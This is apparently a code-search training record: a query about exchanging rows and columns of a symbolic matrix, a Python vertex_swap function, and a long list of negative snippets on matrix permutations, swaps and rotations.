'tuple':\n return self._shape[-1]\n else:\n return self._shape", "def get_num_dimensions(self):\n dimensions = self.data.shape\n return dimensions[1]", "def dim(self):\n return (self.n, )", "def __len__(self):\n # type: () -> int\n return self.shape[0]", "def ncells(self):\n return self.izone.size", "def nD(self):\n return self.locations.shape[0] * len(self.components)", "def getDim(self):\n return \"%dx%d\" % (self.rows, self.cols)", "def matShape(mat):\n return (len(mat),len(mat[0]))", "def ndim(self) -> int:\r\n return len(self.plates)", "def get_dof(self):\n return len(self.a_n)", "def dim(self):\n\t\treturn self.D", "def __len__(self):\r\n return int(np.ceil(len(self.pathways) / float(self.batch_size)))", "def nx(self):\n return self.__nx-2*self.pml_length", "def get_grid_width(self):\n # replace with your code\n return 0", "def num_quadrature_points(self) -> int:", "def rows(self) -> int:\n return self.__squares.__len__()", "def get_input_dim(self) -> int:\n raise NotImplementedError", "def num_cells(self):\n if hasattr(self, '__num_cells__'):\n return self.__num_cells__\n if self.x is not None:\n return self.x.size(self.__cat_dim__('x', self.x))\n if self.boundary_index is not None:\n return int(self.boundary_index[1,:].max()) + 1\n assert self.upper_index is None and self.lower_index is None\n return None", "def dim(self,mat):\n result = np.shape(mat)\n self.dimensions = result\n return self.dimensions", "def get_dimension_length(self):\n pass", "def nsites(self) -> int:\n return len(self.A)", "def num_parameters(self) -> int:\n return len(self.w) + prod(self.v.shape) - len(self.v)", "def width(self):\n return self.i_node.distance(self.j_node)" ]
[ "0.67515165", "0.67112654", "0.6535919", "0.653394", "0.64353853", "0.6379742", "0.63764715", "0.63629043", "0.63574785", "0.63428813", "0.62986326", "0.6278618", "0.62567246", "0.62425613", "0.6237966", "0.6212587", "0.6183233", "0.61782753", "0.61762774", "0.61756885", "0.6173078", "0.6171133", "0.61695725", "0.61553955", "0.6145848", "0.6143558", "0.6143558", "0.61384237", "0.6121866", "0.61109114", "0.61099464", "0.6102169", "0.6100881", "0.60988355", "0.60914415", "0.60912895", "0.60797006", "0.60751504", "0.6073545", "0.60726696", "0.60682726", "0.6066201", "0.6063794", "0.60608405", "0.60524803", "0.60439014", "0.6034139", "0.60324085", "0.6028394", "0.6027569", "0.6025686", "0.6020437", "0.6018058", "0.60153395", "0.60114664", "0.6006208", "0.59950763", "0.5992419", "0.5992419", "0.59921795", "0.5989881", "0.5983861", "0.5976259", "0.5972445", "0.59680414", "0.5966377", "0.5965046", "0.5964087", "0.5961787", "0.5957779", "0.59314173", "0.59222436", "0.5918292", "0.59114695", "0.590334", "0.5899204", "0.5881982", "0.5875742", "0.58710384", "0.58633184", "0.5856082", "0.58543617", "0.5853011", "0.5848631", "0.5846997", "0.5846564", "0.5841678", "0.58262444", "0.58250344", "0.5819995", "0.5819645", "0.5818771", "0.58114475", "0.581131", "0.5804395", "0.5800937", "0.5800435", "0.5798782", "0.5794297", "0.5786859", "0.5782895" ]
0.0
-1
r""" Permutations (i1,j1) > (i2,j2) Make an exchange of rows/columns in matrix data. This is used in multiplication of full symbolic matrices.
def vertex_swap(d, n, l, i1, i2, j1, j2):
    if i1 == i2 and j1 == j2:
        return l
    if i1 == j1:
        # (i1,i1) -> (i2,i2)
        assert i2 == j2
        def swap(v):
            swap2(d, n, v, i1, i2)
    elif i1 == i2:
        # (i,j1) -> (i,j2)
        def swap(v):
            swap2(d, n, v, j1, j2)
    elif j1 == j2:
        # (i1,j) -> (i2,j)
        def swap(v):
            swap2(d, n, v, i1, i2)
    elif i1 == j2 and i2 == j1:
        # (i1,j1) -> (j1,i1)
        def swap(v):
            swap2(d, n, v, i1, j1)
    elif i1 == j2:
        # (i1,j1) -> (i2,i1)
        def swap(v):
            swap3(d, n, v, j1, i1, i2)
    elif i2 == j1:
        # (i1,j1) -> (j1,j2)
        def swap(v):
            swap3(d, n, v, i1, j1, j2)
    else:
        # (i1,j1) -> (i2,j2)
        def swap(v):
            swap2(d, n, v, i1, i2)
            swap2(d, n, v, j1, j2)
    ll = []
    for v in l:
        v = v.__copy__()
        swap(v)
        v.set_immutable()
        ll.append(v)
    ll.sort()
    return tuple(ll)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def swap_columns(i, j, *args):\n output = list()\n for M in args:\n output.append(_cswap(i, j, M))\n return output", "def swap_rows(i, j, *args):\n output = list()\n for M in args:\n output.append(_rswap(i, j, M))\n return output", "def return_swaps( # pylint: disable=too-many-locals,too-many-branches,too-many-statements\n self, old_mapping, new_mapping, permutation=None\n ):\n if permutation is None:\n permutation = list(range(self.num_rows))\n swap_operations = []\n\n class Position: # pylint: disable=too-few-public-methods\n \"\"\"Custom Container.\"\"\"\n\n def __init__( # pylint: disable=too-many-arguments\n self,\n current_row,\n current_column,\n final_row,\n final_column,\n row_after_step_1=None,\n ):\n self.current_row = current_row\n self.current_column = current_column\n self.final_row = final_row\n self.final_column = final_column\n self.row_after_step_1 = row_after_step_1\n\n # final_positions contains info containers\n # final_position[i][j] contains info container with\n # current_row == i and current_column == j\n final_positions = [[None for i in range(self.num_columns)] for j in range(self.num_rows)]\n # move qubits which are in both mappings\n used_mapped_ids = set()\n for logical_id in old_mapping:\n if logical_id in new_mapping:\n used_mapped_ids.add(new_mapping[logical_id])\n old_column = old_mapping[logical_id] % self.num_columns\n old_row = old_mapping[logical_id] // self.num_columns\n new_column = new_mapping[logical_id] % self.num_columns\n new_row = new_mapping[logical_id] // self.num_columns\n info_container = Position(\n current_row=old_row,\n current_column=old_column,\n final_row=new_row,\n final_column=new_column,\n )\n final_positions[old_row][old_column] = info_container\n # exchange all remaining None with the not yet used mapped ids\n all_ids = set(range(self.num_qubits))\n not_used_mapped_ids = list(all_ids.difference(used_mapped_ids))\n not_used_mapped_ids = sorted(not_used_mapped_ids, reverse=True)\n for row in range(self.num_rows):\n for column in range(self.num_columns):\n if final_positions[row][column] is None:\n mapped_id = not_used_mapped_ids.pop()\n new_column = mapped_id % self.num_columns\n new_row = mapped_id // self.num_columns\n info_container = Position(\n current_row=row,\n current_column=column,\n final_row=new_row,\n final_column=new_column,\n )\n final_positions[row][column] = info_container\n if len(not_used_mapped_ids) > 0: # pragma: no cover\n raise RuntimeError('Internal compiler error: len(not_used_mapped_ids) > 0')\n # 1. Assign column_after_step_1 for each element\n # Matching contains the num_columns matchings\n matchings = [None for i in range(self.num_rows)]\n # Build bipartite graph. Nodes are the current columns numbered (0, 1, ...) 
and the destination columns\n # numbered with an offset of self.num_columns (0 + offset, 1+offset, ...)\n graph = nx.Graph()\n offset = self.num_columns\n graph.add_nodes_from(range(self.num_columns), bipartite=0)\n graph.add_nodes_from(range(offset, offset + self.num_columns), bipartite=1)\n # Add an edge to the graph from (i, j+offset) for every element currently in column i which should go to\n # column j for the new mapping\n for row in range(self.num_rows):\n for column in range(self.num_columns):\n destination_column = final_positions[row][column].final_column\n if not graph.has_edge(column, destination_column + offset):\n graph.add_edge(column, destination_column + offset)\n # Keep manual track of multiple edges between nodes\n graph[column][destination_column + offset]['num'] = 1\n else:\n graph[column][destination_column + offset]['num'] += 1\n # Find perfect matching, remove those edges from the graph and do it again:\n for i in range(self.num_rows):\n top_nodes = range(self.num_columns)\n matching = nx.bipartite.maximum_matching(graph, top_nodes)\n matchings[i] = matching\n # Remove all edges of the current perfect matching\n for node in range(self.num_columns):\n if graph[node][matching[node]]['num'] == 1:\n graph.remove_edge(node, matching[node])\n else:\n graph[node][matching[node]]['num'] -= 1\n # permute the matchings:\n tmp = deepcopy(matchings)\n for i in range(self.num_rows):\n matchings[i] = tmp[permutation[i]]\n # Assign row_after_step_1\n for column in range(self.num_columns):\n for row_after_step_1 in range(self.num_rows):\n dest_column = matchings[row_after_step_1][column] - offset\n best_element = None\n for row in range(self.num_rows):\n element = final_positions[row][column]\n if element.row_after_step_1 is not None:\n continue\n if element.final_column == dest_column:\n if best_element is None:\n best_element = element\n elif best_element.final_row > element.final_row:\n best_element = element\n best_element.row_after_step_1 = row_after_step_1\n # 2. Sort inside all the rows\n swaps = self._sort_within_columns(final_positions=final_positions, key=lambda x: x.row_after_step_1)\n swap_operations += swaps\n # 3. Sort inside all the columns\n swaps = self._sort_within_rows(final_positions=final_positions, key=lambda x: x.final_column)\n swap_operations += swaps\n # 4. 
Sort inside all the rows\n swaps = self._sort_within_columns(final_positions=final_positions, key=lambda x: x.final_row)\n swap_operations += swaps\n return swap_operations", "def permutation_matrix(order):\n matrix = np.zeros([order,order])\n matrix[-1,0] = 1\n matrix[0:-1,1::] = np.identity(order-1)\n return matrix", "def xor(m, i, j):\n for e in range(len(m[0])):\n m[j][e] ^= m[i][e]\n return m", "def transpose(m):\n\n pass", "def reverse_matrix(self):\n return SWAP.matrix @ self.matrix @ SWAP.matrix", "def perform_gauss_jordan_elimination(m, show):\n if show:\n print(\"Initial State\")\n print_matrix(m)\n\n r, c = 0, 0\n rows = len(m)\n cols = len(m[0])\n\n if show:\n print(\"rows: %s cols: %s\"%(rows, cols))\n\n while True:\n _swap = False\n\n if show:\n print(\"r %s c %s\"%(r, c))\n\n ## Check Pivot\n if m[r][c] == 0:\n ## Swap\n for i in range(rows):\n if r != i and i > r: ## Avoid comparing the same row and do not swap to upper rows\n if m[i][c] == 1 and not _swap: ## Check if a swap is not performed before in the same column\n if show:\n print(\"Swapping %s %s and %s %s\"%(r, m[r], i, m[i]))\n #m = swap(m,r,i)\n temp = m[r]\n m[r] = m[i]\n m[i] = temp\n _swap = True\n if show:\n print_matrix(m)\n if not _swap: ## If not swap, means there is no 1 to swap, so go to the next column\n c+=1\n\n if m[r][c] == 1:\n ## XOR\n for i in range(rows):\n if r != i: ## Avoid comparing the same row\n if m[i][c] == 1:\n if show:\n print(\"XOR Row %s: %s into Row %s: %s\"%(r, m[r], i, m[i]))\n for e in range(len(m[0])):\n m[i][e] ^= m[r][e]\n if show:\n print_matrix(m)\n\n ## Increase row and column\n r+=1\n c+=1\n\n ## break condition if all rows or all columns (except the augmented column are treated)\n if r == rows or c >= cols-1:\n break\n \n return m", "def jmatswap(ind: int):\n return _jmswap[ind - 1]", "def _swap_permutation(i, j, permutation_vector):\n permutation_vector[i], permutation_vector[j] = permutation_vector[j], permutation_vector[i]", "def transpose(self):\n order = list(self.order)\n order[-2], order[-1] = order[-1], order[-2]\n self.order = order", "def perm2(a,ix):\n if ix==len(a):\n print(a)\n else:\n for j in range(ix+1):\n swap(a,j,ix)\n perm2(a,ix+1)\n swap(a,j,ix)", "def swap(permutation, transposition, remaining=[]):\n i, j = transposition\n nb_positions = len(permutation)\n res = np.array(permutation)\n\n if j < nb_positions:\n res[i], res[j] = res[j], res[i]\n else:\n res[i] = remaining[j-nb_positions]\n\n return tuple(res)", "def _swap(self, i, j, k):\n\t\tif self.verbose:\n\t\t\tprint(i, k)\n\t\t\tprint(i, j)\n\t\t\tprint(j, k)\n\t\tself.arrangement[i],self.arrangement[k] = self.arrangement[k],self.arrangement[i]\n\t\tself.arrangement[i],self.arrangement[j] = self.arrangement[j],self.arrangement[i]\n\t\tself.arrangement[j],self.arrangement[k] = self.arrangement[k],self.arrangement[j]", "def _multi_matmul_chain_order(arrays):\n n = len(arrays)\n # p stores the dimensions of the matrices\n # Example for p: A_{10x100}, B_{100x5}, C_{5x50} --> p = [10, 100, 5, 50]\n # Using -2 to generalize for shapes that are more than 2 dimmensions\n p = [a.shape[-2] for a in arrays] + [arrays[-1].shape[-1]]\n # m is a matrix of costs of the subproblems\n # m[i,j]: min number of scalar multiplications needed to compute A_{i..j}\n m = np.zeros((n, n), dtype=np.double)\n # s is the actual ordering\n # s[i, j] is the value of k at which we split the product A_i..A_j\n s = np.empty((n, n), dtype=np.intp)\n\n for l in range(1, n):\n for i in range(n - l):\n j = i + l\n m[i, j] = np.inf\n for 
k in range(i, j):\n q = m[i, k] + m[k + 1, j] + p[i] * p[k + 1] * p[j + 1]\n if q < m[i, j]:\n m[i, j] = q\n s[i, j] = k # Note that Cormen uses 1-based index\n return s", "def rotate(self, matrix: List[List[int]]) -> None:\r\n n = len(matrix)\r\n for j in range((n+1)//2):\r\n for i in range(n-2*j-1):\r\n matrix[j][j+i], matrix[j+i][n-1-j], matrix[n-1-j][n-1-j-i], matrix[n-1-j-i][j] = matrix[n-1-j-i][j], matrix[j][j+i], matrix[j+i][n-1-j], matrix[n-1-j][n-1-j-i]", "def rotate(self, matrix: List[List[int]]) -> None:\n # note: coded up logic after looking at discussion board\n\n # 1 - swap symmetrically across diagonal so that 123 becomes the first column\n # leftIndent = 0\n n = len(matrix)\n # for i in range(len(matrix)):\n for i in range(n):\n # indent (to only iterate top side of diagonal) adds 1 per line, so same as i\n # for j in range(i, len(matrix[i])):\n for j in range(i, n):\n # print(matrix[i][j], matrix[j][i])\n # print()\n matrix[i][j], matrix[j][i] = matrix[j][i], matrix[i][j]\n\n # print(matrix)\n # 2 - swap elements in individual rows to swap order of columns (since 123 should be last column)\n # for i in range(len(matrix)):\n for i in range(n):\n # for j in range(len(matrix)):\n # print(\"new row: \", matrix[i])\n left = 0\n right = len(matrix[i]) - 1\n while (left <= right):\n # print(\"left: \", left, \" right: \", right, matrix[i][left], matrix[i][right])\n matrix[i][left], matrix[i][right] = matrix[i][right], matrix[i][left]\n left += 1\n right -= 1\n # print(matrix)\n # print()", "def swapColumns(self, i, j):\n if not (type(i) in MATRIX_VALID_INTS and type(\n j) in MATRIX_VALID_INTS): # this should be fixed to accomodate 'long' types\n raise TypeError(\"Row indices must be of type 'int'\")\n columnA = self.deleteColumn(max(i, j))\n columnB = self.deleteColumn(min(i, j))\n self.insertColumn(min(i, j), *columnA)\n self.insertColumn(max(i, j), *columnB)", "def derMatrix(Bulk_Operators, Bdy_Operators, Bulk_second, s=1):\n\t\tMatrix = []\n\t\tfor i in range(1, M_max + 1):\n\t\t\t\trow = []\n\t\t\t\tfor Bulk_Op in Bulk_Operators:\n\t\t\t\t\t\ttable_call = N*table1.table[0, i].subs({\"Delta\":Bulk_Op, \"Delta_12\":delta_12, \"Xi\":1.00})\n\t\t\t\t\t\trow.append(table_call)\n\t\t\t\tfor index in range(len(Bulk_second)):\n\t\t\t\t\t\trow.append(0*table1.table[0,0])\n\t\t\t\tfor Bdy_Op in Bdy_Operators:\n\t\t\t\t\tif Bdy_Op == 2.0:\n\t\t\t\t\t\t\tprint(\"here\")\n\t\t\t\t\t\t\ttable_call = (N-1)*table1.table[1, i].subs({\"Delta\":Bdy_Op, \"Xi\":1.00})\n\t\t\t\t\telse:\n\t\t\t\t\t\ttable_call = table1.table[1, i].subs({\"Delta\":Bdy_Op, \"Xi\":1.00})\n\t\t\t\t\trow.append(table_call)\n\t\t\t\tXi = symbols('Xi')\n\t\t\t\tif s == 1:\n\t\t\t\t\t\tlast_expr = Xi**((delta_1 + delta_2)/2)\n\t\t\t\t\t\tlast_elem = diff(last_expr, Xi, i).subs({\"Xi\":1.00}).evalf()\n\t\t\t\t\t\trow.append(last_elem)\n\t\t\t\tMatrix.append(row)\n\t\t\t\trow2 = []\n\t\t\t\tfor index in range(len(Bulk_Operators)):\n\t\t\t\t\t\trow2.append(0*table1.table[0,0])\n\t\t\t\tfor Bulk_Op in Bulk_second:\n\t\t\t\t\t\ttable_call = table1.table[0, i].subs({\"Delta\":Bulk_Op, \"Delta_12\":delta_12, \"Xi\":1.00})\n\t\t\t\t\t\trow2.append(table_call)\n\t\t\t\tfor Bdy_Op in Bdy_Operators:\n\t\t\t\t\t\tif Bdy_Op == 2.0:\n\t\t\t\t\t\t\tprint(\"here\")\n\t\t\t\t\t\t\ttable_call = -1*table1.table[1, i].subs({\"Delta\":Bdy_Op, \"Xi\":1.00})\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ttable_call = table1.table[1, i].subs({\"Delta\":Bdy_Op, \"Xi\":1.00})\n\t\t\t\t\t\trow2.append(table_call)\n\t\t\t\tXi = symbols('Xi')\n\t\t\t\tif s == 
1:\n\t\t\t\t\t\tlast_expr = Xi**((delta_1 + delta_2)/2)\n\t\t\t\t\t\tlast_elem = diff(last_expr, Xi, i).subs({\"Xi\":1.00}).evalf()\n\t\t\t\t\t\trow2.append(last_elem)\n\t\t\t\tMatrix.append(row2)\t\t\n\t\treturn np.array(Matrix)", "def transpose():", "def test_distance_matrix_permutation_test_symmetric(self):\r\n def make_result_list(*args, **kwargs):\r\n return (\r\n [distance_matrix_permutation_test(*args)[2] for i in range(10)]\r\n )\r\n\r\n m = array([[0, 1, 3], [1, 2, 4], [3, 4, 5]])\r\n # looks at each possible permutation n times --\r\n # compare first row to rest\r\n n = 100\r\n\r\n # looks at each possible permutation n times --\r\n # compare first row to rest\r\n r = make_result_list(m, [(0, 0), (0, 1), (0, 2)], n=n)\r\n self.assertSimilarMeans(r, 0. / 6.)\r\n r = make_result_list(m, [(0, 0), (0, 1), (0, 2)], n=n, tails='high')\r\n self.assertSimilarMeans(r, 0.77281447417149496, 0)\r\n r = make_result_list(m, [(0, 0), (0, 1), (0, 2)], n=n, tails='low')\r\n self.assertSimilarMeans(r, 4. / 6.)\r\n\r\n # The following lines are not part of the test code, but are useful in\r\n # figuring out what t-scores all of the permutations will yield.\r\n # permutes = [[0, 1, 2], [0, 2, 1], [1, 0, 2],\\\r\n # [1, 2, 0], [2, 0, 1], [2, 1, 0]]\r\n #results = []\r\n # for p in permutes:\r\n # p_m = permute_2d(m,p)\r\n # results.append(t_two_sample(\\\r\n # [p_m[0,1],p_m[0,2]],[p_m[2,1]],tails='high'))\r\n # print results\r", "def rotate1(self, matrix: List[List[int]]) -> None:\n matrixLen = len(matrix)\n\n for i in range(matrixLen):\n for j in range(i, matrixLen):\n print(i, j)\n matrix[i][j], matrix[j][i] = matrix[j][i], matrix[i][j]\n\n for i in range(matrixLen):\n for j in range(matrixLen // 2):\n matrix[i][j], matrix[i][matrixLen - 1 - j] = matrix[i][matrixLen - 1 - j], matrix[i][j]", "def test_dim2(self):\r\n # Each row of p is a different permutation to inverse\r\n p = imatrix()\r\n inv = inverse_permutation(p)\r\n f_inverse = function([p], inv)\r\n\r\n rng = numpy.random.RandomState(utt.fetch_seed())\r\n # Generate 10 random permutations\r\n p_val = numpy.asarray([rng.permutation(10) for i in range(7)],\r\n dtype='int32')\r\n inv_val = f_inverse(p_val)\r\n\r\n # Check that the inverse of the inverse is the original permutation list\r\n assert numpy.all(f_inverse(inv_val) == p_val)\r\n # Check that, for each permutation,\r\n # permutation(inverse) == inverse(permutation) = identity\r\n for p_row, i_row in zip(p_val, inv_val):\r\n assert numpy.all(p_row[i_row] == numpy.arange(10))\r\n assert numpy.all(i_row[p_row] == numpy.arange(10))", "def rotate(self, matrix: List[List[int]]) -> None:\n n = len(matrix)\n for dig in range(n):\n row = dig\n for col in range(dig+1, n):\n matrix[row][col] , matrix[col][row] = matrix[col][row], matrix[row][col]\n print(matrix)\n left = 0\n right = n-1\n while left < right:\n for row in range(n):\n matrix[row][left], matrix[row][right] = matrix[row][right], matrix[row][left]\n left+=1\n right-=1", "def perform_gauss_jordan_elimination_(m, show):\n if show:\n print(\"Initial State\")\n print_matrix(m)\n \n r = 0\n c = 0\n rows, cols = len(m), len(m[0])\n\n if show:\n print(\"rows: %s cols: %s\"%(rows, cols))\n\n while True:\n if show:\n print(\"r %s c %s\"%(r, c))\n\n ## Check Pivot\n _swap = False\n if m[r,c] == 0:\n for i in range(r+1,rows):\n if m[i,c] == 1:# If new pivot found... 
swap\n if show:\n print(\"Swapping %s %s and %s %s\"%(r, m[r], i, m[i]))\n m[[i,r]] = m[[r,i]] ## Swap\n _swap = True\n if show:\n print_matrix(m)\n break # No more swapping in this column\n if not _swap: ## No swap, move to the next column, same row\n c+=1\n\n if m[r,c] == 1:\n ## XOR\n for i in range(rows):\n indexes = np.setdiff1d(np.where(m[:,c] == 1),r) # Get all the ones to XOR in the same column\n for i in indexes:\n m[i] = np.bitwise_xor(m[i],m[r]) # Bitwise XOR\n if show:\n print(\"XOR Row %s: %s into Row %s: %s\"%(r, m[r], i, m[i]))\n if show:\n print_matrix(m)\n\n ## Increase row and column\n r+=1\n c+=1\n\n ## break condition if all rows or all columns (except the augmented column) are treated\n if r == rows or c >= cols-1:\n break\n\n if show:\n print(\"Final State\")\n print_matrix(m)\n \n return m", "def _clifford_swap(cls, slot_i, slot_j) -> Tensor:\n\n return Tensor(\n {\n Tensor._merge_keys((slot_j,), (slot_i,)): -1,\n Tensor._merge_keys(): 2 * cls.symmetric_bilinear_form(slot_i, slot_j),\n }\n )", "def rotate2D(self, matrix) -> None:\n N = len(matrix)\n\n # In case of N is odd, the innermost square belt is just one cell, no need of rotating.\n for i in range(0,int(N/2)): # outer loop for each square belt\t\t\t\n for j in range(i,N-i-1): # N-i group in the i-th square belt\n #print(i,j)\n tmp = matrix[i][j]\n matrix[i][j] = matrix[N-j-1][i]\n matrix[N-j-1][i] = matrix[N-i-1][N-j-1]\n matrix[N-i-1][N-j-1] = matrix[j][N-i-1]\n matrix[j][N-i-1] = tmp\n #print(matrix)", "def rotate(self, m):\n n = len(m)\n for i in range(n//2):\n for j in range(i,n-i-1):\n m[j][~i],m[~i][~j],m[~j][i],m[i][j] = \\\n m[i][j],m[j][~i],m[~i][~j],m[~j][i]", "def T(self):\n # TODO - your code here\n transpose = []\n for col in range(self.w):\n new_row = []\n for row in range(self.h):\n new_row.append(self.g[row][col])\n transpose.append(new_row)\n return Matrix(transpose)\n # TODO - your code here", "def _cswap(i, j, S):\n N = _rswap(i, j, S.transpose()).transpose()\n return N", "def transp(self, x1, x2, d):\n raise NotImplementedError", "def transpose(self):\n pass", "def commute_matrix(A):\n R = resistance_matrix(A)\n E = A.sum() / 2 # number of edges in graph\n C = 2 * E * R\n return C", "def test_distance_matrix_permutation_test_non_symmetric(self):\r\n def make_result_list(*args, **kwargs):\r\n return [distance_matrix_permutation_test(*args, **kwargs)[2]\r\n for i in range(10)]\r\n\r\n m = arange(9).reshape((3, 3))\r\n n = 100\r\n # looks at each possible permutation n times --\r\n # compare first row to rest\r\n r = make_result_list(\r\n m, [(0, 0), (0, 1), (0, 2)], n=n, is_symmetric=False)\r\n self.assertSimilarMeans(r, 0. / 6.)\r\n r = make_result_list(\r\n m, [(0, 0), (0, 1), (0, 2)], n=n, is_symmetric=False,\r\n tails='high')\r\n self.assertSimilarMeans(r, 4. / 6.)\r\n r = make_result_list(\r\n m, [(0, 0), (0, 1), (0, 2)], n=n, is_symmetric=False,\r\n tails='low')\r\n self.assertSimilarMeans(r, 0. / 6.)\r\n\r\n # looks at each possible permutation n times --\r\n # compare last row to rest\r\n r = make_result_list(\r\n m, [(2, 0), (2, 1), (2, 2)], n=n, is_symmetric=False)\r\n self.assertSimilarMeans(r, 0. / 6.)\r\n r = make_result_list(\r\n m, [(2, 0), (2, 1), (2, 2)], n=n, is_symmetric=False,\r\n tails='high')\r\n self.assertSimilarMeans(r, 0. / 6.)\r\n r = make_result_list(\r\n m, [(2, 0), (2, 1), (2, 2)], n=n, is_symmetric=False,\r\n tails='low')\r\n self.assertSimilarMeans(r, 4. 
/ 6.)", "def rotate(self, matrix: List[List[int]]) -> None:\n n = len(matrix[0])\n for i in range(n // 2 + n % 2):\n for j in range(n // 2):\n tmp = matrix[n - 1 - j][i]\n matrix[n - 1 - j][i] = matrix[n - 1 - i][n - j - 1]\n matrix[n - 1 - i][n - j - 1] = matrix[j][n - 1 -i]\n matrix[j][n - 1 - i] = matrix[i][j]\n matrix[i][j] = tmp", "def transpose(self):\n return self.conjugate()", "def swap_cells(state, i1, j1, i2, j2):\n value1 = state[i1][j1]\n value2 = state[i2][j2]\n \n new_state = []\n for row in range(len(state)): \n new_row = []\n for column in range(len(state[row])): \n if row == i1 and column == j1: \n new_row.append(value2)\n elif row == i2 and column == j2:\n new_row.append(value1)\n else: \n new_row.append(state[row][column])\n new_state.append(tuple(new_row))\n return tuple(new_state)", "def transpose(self) -> None:\n ...", "def matrix_mult(m1, m2):\n\ttemp = []\n\tfor i in range(len(m1)):\n\t\te = []\n\t\tfor j in range(len(m2[0])):\n\t\t\te.append(row_times_column(m1,i,m2,j))\n\t\ttemp.append(e)\n\treturn temp", "def transpositions(self):\n a = self.cyclic_form\n res = []\n for x in a:\n nx = len(x)\n if nx == 2:\n res.append(tuple(x))\n elif nx > 2:\n first = x[0]\n for y in x[nx-1:0:-1]:\n res.append((first,y))\n return res", "def test_permute_2d(self):\r\n a = reshape(arange(9), (3, 3))\r\n self.assertEqual(permute_2d(a, [0, 1, 2]), a)\r\n self.assertEqual(permute_2d(a, [2, 1, 0]),\r\n array([[8, 7, 6], [5, 4, 3], [2, 1, 0]]))\r\n self.assertEqual(permute_2d(a, [1, 2, 0]),\r\n array([[4, 5, 3], [7, 8, 6], [1, 2, 0]]))", "def commutes_with(self, other):\n a = self.array_form\n b = other.array_form\n if len(a) != len(b):\n raise ValueError(\"The number of elements in the permutations \\\ndon\\'t match.\")\n for i in range(len(a)-1):\n if a[b[i]] != b[a[i]]:\n return False\n return True", "def _rswap(i, j, S):\n N = copy.deepcopy(S)\n row = copy.deepcopy(N[i])\n N[i] = copy.deepcopy(N[j])\n N[j] = row\n return N", "def rotate(self, matrix: List[List[int]]) -> None:\n n = len(matrix)\n for i in range(n):\n for j in range(i+1):\n matrix[i][j], matrix[j][i] = matrix[j][i], matrix[i][j]\n for i in range(n//2):\n for j in range(n):\n matrix[j][i], matrix[j][n-i-1] = matrix[j][n-i-1], matrix[j][i]\n return matrix", "def _flip_vectors(jn_matrix, m_matrix):\r\n m_matrix_trans = m_matrix.transpose()\r\n jn_matrix_trans = jn_matrix.transpose()\r\n new_matrix = zeros(jn_matrix_trans.shape, float)\r\n for i, m_vector in enumerate(m_matrix_trans):\r\n jn_vector = jn_matrix_trans[i]\r\n disT = list(m_vector - jn_vector)\r\n disT = sum(map(abs, disT))\r\n jn_flip = jn_vector * [-1]\r\n disF = list(m_vector - jn_flip)\r\n disF = sum(map(abs, disF))\r\n if disT > disF:\r\n new_matrix[i] = jn_flip\r\n else:\r\n new_matrix[i] = jn_vector\r\n return new_matrix.transpose()", "def rotate(self, matrix: List[List[int]]) -> None:\n n = len(matrix)\n for i in range(n - 1):\n for j in range(n - 1 - i):\n matrix[i][j], matrix[n-1-j][n-1-i] = matrix[n-1-j][n-1-i], matrix[i][j]\n for i in range(n):\n for j in range(n // 2):\n matrix[j][i], matrix[n-1-j][i] = matrix[n-1-j][i], matrix[j][i]", "def rotate(self, matrix: List[List[int]]) -> None:\n n = len(matrix)\n for l in range(n // 2):\n r = n - 1 - l\n for p in range(l, r):\n q = n - 1 - p\n cache = matrix[l][p]\n matrix[l][p] = matrix[q][l]\n matrix[q][l] = matrix[r][q]\n matrix[r][q] = matrix[p][r]\n matrix[p][r] = cache", "def rotateMatrixAttempt(matrix):\n for idxring in range(len(matrix) / 2):\n swap = []\n ringgen = ringCoords(len(matrix), 
idxring)\n for x, y in ringgen:\n swap.append(matrix[y][x])\n ringgen = ringCoords(len(matrix), idxring)\n start_idx = len(matrix) - 1 - idxring\n for swapidx in range(-1 * start_idx, len(swap) - start_idx):\n x, y = ringgen.next()\n matrix[y][x] = swap[swapidx]", "def rotate(self, matrix: List[List[int]]) -> None:\n n = len(matrix)\n if n <= 1:\n return\n\n for i in range((n + 1)//2):\n for j in range(i, n - 1 - i):\n tmp = matrix[i][j]\n matrix[i][j] = matrix[n - 1 - j][i]\n matrix[n - 1 - j][i] = matrix[n - 1 - i][n - 1 - j]\n matrix[n - 1 - i][n - 1 - j] = matrix[j][n - 1 - i]\n matrix[j][n - 1 - i] = tmp", "def build_symmetry_operations(symmetry: List[Any]) -> None:\n dim = len(symmetry[0][0])\n unit = numpy.identity(dim, dtype=int)\n for permutation in symmetry:\n perm = unit[:, numpy.argsort(permutation[0])]\n permutation[0] = perm", "def mat24_perm_to_int(p):\n oct = sum(1 << x for x in p[:8])\n res = gc.vect_to_octad(oct) \n #print(\"p2i oct\", hex(oct))\n res -= STD_OCTAD\n res += (res >> 12) & 759 \n #print(\"p2i\", res)\n p1 = [24]*32\n oct, j = 8 * oct, 0x00 \n for i in range(24):\n o = oct & 8\n p1[i] = (j >> o) & 0x1f\n j += 1 << o\n oct >>= 1\n q, q_inv = [None]*8, [None]*8\n for i in range(8):\n j = p1[p[i] & 0x1f] & 7\n q[j] = i\n q_inv[i] = j\n for i in range(6):\n # exchange place i with place q_inv[i]\n j = q_inv[i]\n #q_inv[q[i]], q_inv[q[j]] = q_inv[q[j]], q_inv[q[i]]\n #q[i], q[j] = q[j], q[i]\n #assert q[:i] == q_inv[:i] == lrange(i)\n q_inv[q[i]] = q_inv[q[j]]\n q[j] = q[i]\n #print(\"p2i%d\" % i, j-i) \n res = res * (8 - i) + j - i\n #print(\"p2ifinal\", p1[p[8] & 0x1f]) \n return 16 * res + p1[p[8] & 0x1f]", "def Jac(M):\n x = [sy.Dummy() for _ in range(nargs(M))]\n y = M(*x)\n J = [sy.diff(yi, xi) for yi in y for xi in x]\n return sy.lambdify(x, J, 'sympy')", "def apply_columns_recursive_inplace(self, mat1: 'Nparray',\n mat2: 'Nparray') -> None:\n trans = FqeData(self.nbeta(),\n self.nalpha(),\n self.norb(),\n self._core.alpha_beta_transpose(),\n dtype=self.coeff.dtype)\n buf = trans.coeff.reshape(self.lena(), self.lenb())\n self._apply_columns_recursive_alpha(mat1, buf)\n\n if fqe.settings.use_accelerated_code:\n _transpose(trans.coeff, self.coeff)\n else:\n trans.coeff[:, :] = self.coeff.T[:, :]\n buf = self.coeff.reshape(self.lenb(), self.lena())\n trans._apply_columns_recursive_alpha(mat2, buf)\n\n if fqe.settings.use_accelerated_code:\n _transpose(self.coeff, trans.coeff)\n else:\n self.coeff[:, :] = trans.coeff.T[:, :]", "def swap2(d, n, v, i, j):\n for a in range(n):\n for k in 